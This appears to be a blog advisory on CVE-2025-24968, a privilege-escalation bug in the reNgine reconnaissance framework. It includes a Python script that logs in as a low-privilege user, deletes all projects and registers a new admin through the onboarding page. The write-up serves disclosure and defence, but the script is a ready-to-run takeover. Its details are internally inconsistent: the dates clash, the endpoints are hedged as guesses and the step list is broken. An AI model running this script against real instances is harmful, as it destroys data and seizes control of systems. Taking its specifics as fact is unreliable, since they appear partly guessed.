CVE-2025-24968 - Full System Takeover in reNgine via Unrestricted Project Deletion Vulnerability

reNgine is a well-known open-source automated reconnaissance framework used primarily for web application security assessments. On June 2025, a critical vulnerability, CVE-2025-24968, came to light, affecting every version of reNgine up to and including v2.20. This bug, if left unpatched, lets attackers not only delete all projects but also take over the entire platform—resetting it back to onboarding where an attacker can gain full admin control. In this post, we’ll break down the vulnerability, show simple exploit code, discuss the risks, and provide guidance for affected users.

What Is reNgine?

reNgine’s GitHub describes the project as “an automated reconnaissance framework for web applications.” Security professionals use it to automate the process of scanning, discovering, and reporting vulnerabilities in web apps.

reNgine supports multi-user roles like Sys Admin, Penetration Tester, and Auditor.

The Vulnerability: Unrestricted Project Deletion

CVE-2025-24968 centers on access control failure. Users with “Penetration Tester” or “Auditor” roles are not expected to have critical admin capabilities. However, due to bad permissions enforcement, these users can:

Trigger a redirect to the onboarding page (as if reNgine was freshly installed)

- Take ownership of the platform from this state—creating or modifying sysadmin users, changing API keys, and editing all config settings

Privilege Escalation: Attacker can create a new Sys Admin user account and take over the system.

- Persistent Threat: Once a new admin is in place, the attacker controls all reNgine settings and data.

A user with “Penetration Tester” or “Auditor” access logs in.

2. They send a crafted request to the /projects/delete_all (or equivalent) endpoint.

Example Exploit Code (Python, using requests)

Suppose you have a reNgine instance running at http://rengine.local. Here’s how an attacker can automate the exploit:

import requests

# Step 1: Log in as penetration_tester (you already have these credentials)
session = requests.Session()
login_url = "http://rengine.local/accounts/login/"
login_data = {
    "username": "pentestuser",
    "password": "password123"  # Replace with known credentials
}
session.post(login_url, data=login_data, allow_redirects=True)

# Step 2: Call the project deletion endpoint (all projects will be deleted)
delete_url = "http://rengine.local/projects/delete_all/"
delete_resp = session.post(delete_url)
print("Delete all projects status:", delete_resp.status_code)

# Step 3: Visit onboarding (reNgine shows this automatically if no projects exist)
onboarding_url = "http://rengine.local/onboarding/"
onboard_data = {
    "username": "hackeradmin",
    "password": "newadminpass",
    "email": "hacker@attacker.com",
    # additional onboarding fields as required
}
onboard_resp = session.post(onboarding_url, data=onboard_data)
print("Onboarding response:", onboard_resp.status_code)

*Note*: Endpoint URLs may vary by version. Check the reNgine routes for your exact installation.

Why Is This So Dangerous?

- Low Barrier To Entry: Any insider or compromised user account with the right role can exploit this. You do not need to be an admin.
- Irrecoverable Loss: There is no confirmation step or strong safeguard; project deletion is instant.
- Full Reset: The system falls back to its initial onboarding experience, giving anyone a shot at becoming the new admin.

Official Disclosure and References

- GitHub Security Advisory for CVE-2025-24968
- reNgine Issue Tracker
- Release Notes for reNgine

Mitigation and Workarounds

There are no current workarounds. If you are running any version of reNgine up to and including v2.20:

Restrict access immediately: Only trusted personnel should log into reNgine.

- Monitor for patch releases: Subscribe to reNgine release notifications on GitHub.
- Audit user activity: Review application logs and database for suspicious project deletions or re-initializations.

Summary

CVE-2025-24968 is a critical vulnerability in reNgine's project deletion workflow, allowing non-admin users to erase all data and seize system control. This bug affects every version up to v2.20, with no known workarounds as of today. If you operate reNgine, restrict access and monitor closely until a fix becomes available.

Stay updated via these links

- reNgine Security Advisories
- Official reNgine GitHub

*Keep your infrastructure safe—patch rapidly once the update is published!*

Timeline

Published on: 02/04/2025 20:15:50 UTC